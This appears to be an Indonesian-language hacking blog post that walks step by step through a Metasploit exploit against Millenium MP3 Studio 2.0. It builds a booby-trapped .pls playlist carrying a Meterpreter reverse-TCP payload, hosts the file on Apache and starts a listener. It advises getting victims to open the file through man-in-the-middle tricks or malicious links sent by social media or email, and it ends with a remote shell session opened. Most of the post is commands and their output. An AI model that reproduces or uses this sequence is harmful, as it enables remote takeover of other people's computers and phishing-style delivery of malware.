Searching...
January 8, 2012
Anonymous
Sunday, January 08, 2012
0 comment

Metasploit VS Millenium MP3 Studio 2.0

Home » exploitation » Metasploit » Penetration Test » Metasploit VS Millenium MP3 Studio 2.0

Preparation :
[*] Metasploit
[*] Apache2

Briefing :
[*] Buat file 0day untuk Millenium MP3 Studio 2.0
[*] Pindahkan file 0day ke directory /var/www/
[*] Tunggu hingga korban memainkan file 0day kita
[*] Game Over

Walkthrough:
1. Buat file 0day untuk Millenium MP3 Studio 2.0

Command :
msf > use exploit/windows/fileformat/millenium_mp3_pls

Kemudian, kita setting file 0day kita.

Command :

msf  exploit(millenium_mp3_pls) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcpmsf  exploit(millenium_mp3_pls) > set LHOST 172.16.230.1LHOST => 172.16.230.1msf  exploit(millenium_mp3_pls) > set LPORT 4444LPORT => 4444msf  exploit(millenium_mp3_pls) > set FILENAME listen-to-me.plsFILENAME => listen-to-me.plsmsf  exploit(millenium_mp3_pls) > set EXITFUNC noneEXITFUNC => none

Cek eksploit kita untuk memastikan tidak ada parameter yang kosong.

Command :

msf  exploit(millenium_mp3_pls) > show options 

Module options (exploit/windows/fileformat/millenium_mp3_pls):   Name      Current Setting   Required  Description   ----      ---------------   --------  -----------   FILENAME  listen-to-me.pls  yes       The file name.Payload options (windows/meterpreter/reverse_tcp):   Name      Current Setting  Required  Description   ----      ---------------  --------  -----------   EXITFUNC  none             yes       Exit technique: seh, thread, process, none   LHOST     172.16.230.1     yes       The listen address   LPORT     4444             yes       The listen portExploit target:   Id  Name   --  ----   0   Windows Universal

Kemudian masukan perintah exploit untuk membuat file 0day.

Command :

msf  exploit(millenium_mp3_pls) > exploit 

[*] Creating 'listen-to-me.pls' file ...[+] listen-to-me.pls stored at /root/.msf4/local/listen-to-me.pls

Ok. File kita sudah dibuat, dan di simpan di dalam direktori /root/.msf4/local/ bernama listen-to-me.pls


2. Pindahkan file listen-to-me.pls ke direktori /var/www

Gunakan perintah mv, atau cp untuk memindahkan file ini.

Command :
root@revolution:~# cp /root/.msf4/local/listen-to-me.pls /var/www/

Kemudian cek kembali bahwa file kita sudah terpindah ke direktori /var/www/

Command :

root@revolution:~# cd /var/www/
root@revolution:/var/www# lltotal 54680drwxr-xr-x  4 root     root         4096 2012-01-08 14:05 ./drwxr-xr-x 16 root     root         4096 2011-06-08 20:16 ../drwxr-xr-x 10 www-data www-data     4096 2012-01-07 19:36 beef/-rw-r--r--  1 root     root      8156634 2009-12-10 07:48 BigAntServer_Enu_Setup.exe-rwxrwxrwx  1 root     root      7983311 2011-11-01 15:06 ca_setup.exe*-rw-r--r--  1 root     root         4160 2012-01-08 14:05 listen-to-me.pls-rwxrwxrwx  1 root     root      1851184 2012-01-05 18:36 millennium.exe*-rw-r--r--  1 root     root       102476 2012-01-07 19:57 minishare-1.4.1.exe-rwxrwxrwx  1 root     root      1269567 2011-12-27 16:51 Savant31.exe*-rwxrwxrwx  1 root     root     17050136 2011-11-27 09:43 ServUSetup.exe*-rwxrwxrwx  1 root     root     19541182 2011-11-01 15:05 wireshark-win32-1.6.2.exe*drwxr-xr-x  2 root     root         4096 2011-05-10 14:44 wstool/


Sekarang kita tunggu hingga seseorang mengabil file ini, kemudian mengeksekusinya dengan program Millenium MP3 Studio 2.0. Anda bisa menggunakan cara MITM atau mengirim malicious link kepada korban melalui jejaring social, atau email. Jangan lupa untuk mengaktifkan multi/handler pada metasploit.

Command :

msf  exploit(millenium_mp3_pls) > use exploit/multi/handler 
msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcpPAYLOAD => windows/meterpreter/reverse_tcpmsf  exploit(handler) > set LHOST 172.16.230.1LHOST => 172.16.230.1msf  exploit(handler) > set LPORT 4444LPORT => 4444

Cek kembali exploit multi handler kita.

Command :

msf  exploit(handler) > show options 

Module options (exploit/multi/handler):   Name  Current Setting  Required  Description   ----  ---------------  --------  -----------Payload options (windows/meterpreter/reverse_tcp):   Name      Current Setting  Required  Description   ----      ---------------  --------  -----------   EXITFUNC  process          yes       Exit technique: seh, thread, process, none   LHOST     172.16.230.1     yes       The listen address   LPORT     4444             yes       The listen portExploit target:   Id  Name   --  ----   0   Wildcard Target

Kemudian exploit untuk menjalankan multi handler

Command :

msf  exploit(handler) > exploit 

[*] Started reverse handler on 172.16.230.1:4444 [*] Starting the payload handler...


3. Korban masuk kedalam perangkap.

Dan ini yang akan terjadi ketika korban masuk ke dalam perangkap.

Command :

msf  exploit(handler) > exploit 

[*] Started reverse handler on 172.16.230.1:4444 [*] Starting the payload handler...[*] Sending stage (752128 bytes) to 172.16.230.128[*] Meterpreter session 1 opened (172.16.230.1:4444 -> 172.16.230.128:1187) at 2012-01-08 15:27:02 +0700meterpreter >


Excellent like usual =)

created by : red-dragon
Originaly Created By Anonymous on Sunday, January 08, 2012
Labels: , ,
Share This To :

0 comment:

Post a Comment

Subscribe to: Post Comments (Atom)
 
Back to top!